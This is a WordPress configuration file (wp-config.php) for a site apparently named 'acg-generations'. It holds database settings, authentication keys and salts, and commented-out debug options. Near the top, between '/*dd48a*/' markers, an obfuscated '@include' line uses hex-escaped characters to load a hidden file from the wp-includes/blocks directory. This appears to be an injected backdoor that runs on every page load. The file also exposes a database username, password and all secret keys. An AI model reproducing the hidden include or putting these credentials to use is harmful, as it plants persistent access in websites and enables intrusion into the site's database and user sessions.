File: /home/sites/acg-generations/wp-config.php
<?php
define( 'WP_CACHE', false );
/*dd48a*/
@include /*1q*/("/home/sites/a\x63g\x2dgenerations/wp\x2din\x63ludes/blo\x63ks/blo\x63k/.92255281.oti");
/*dd48a*/
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'acg_wp_db' );
/** MySQL database username */
define( 'DB_USER', 'gouvernance' );
/** MySQL database password */
define( 'DB_PASSWORD', '8w}eNsfdKW' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '&6-`jsMxBVTJ[qbl$C.KfbBQ_Qs1D[A?D X}&7N;dcP8xYB!:799nms~XR_{tqQb' );
define( 'SECURE_AUTH_KEY', 'KoU@t.z&%6%DL3_H ?HP&&%>$BP|:>~[AdL#B7D(_0J5@@IxygsCEVBP+iXdlPc-' );
define( 'LOGGED_IN_KEY', 'V[Vi<?(HMwGg;[SnU7j6;D3O{:-23o8bcZU_=L;.+^:<Yzr:y2P?A8Ym%VVw]6/V' );
define( 'NONCE_KEY', 'jaU1DVlXq3f>k1aSfWcI 7BUF !NLxM BXfm}ocwrV3}XWZ!a7p)r}$%1S2k}dU3' );
define( 'AUTH_SALT', '[b{)a]3L~vtntZUB8U94DpM|:H+C$I#>aPtYD0N $&oCZyp#I9^BXdz/3M}RM?/F' );
define( 'SECURE_AUTH_SALT', 'A>^cS3Q$9eGLg=yU[H?cUK%*$+8(~6St,:o#1[WzDueP[lAT3xo`[&/q(_NUmG^`' );
define( 'LOGGED_IN_SALT', 'gc*`H?yycLnVyFJ{H4d<s`q4nki;}4+24Y=XMLLN!iGkk?PNzJBRjMzgA~jE!d]Q' );
define( 'NONCE_SALT', '8v`drQ)UCaQ(0oqmOm,=`3sq<wr%X0rrr`$kTz4gtG#R_(1<3f_=ti?5%ju;i@>a' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
//define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
//define( 'WP_DEBUG', true );
// Active l’enregistrement dans le fichier /wp-content/debug.log
//define( 'WP_DEBUG_LOG', true );
// Désactive l’affichage des erreurs et des avertissements
//define( 'WP_DEBUG_DISPLAY', true);
//@ini_set( 'display_errors', 1);
// Utiliser les versions en développement des fichiers JS et CSS de base (seulement nécessaire si vous modifiez ces fichiers de base)
//define( 'SCRIPT_DEBUG', true );
////remove starting from here
define( 'WP_MEMORY_LIMIT', '256M' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( !defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';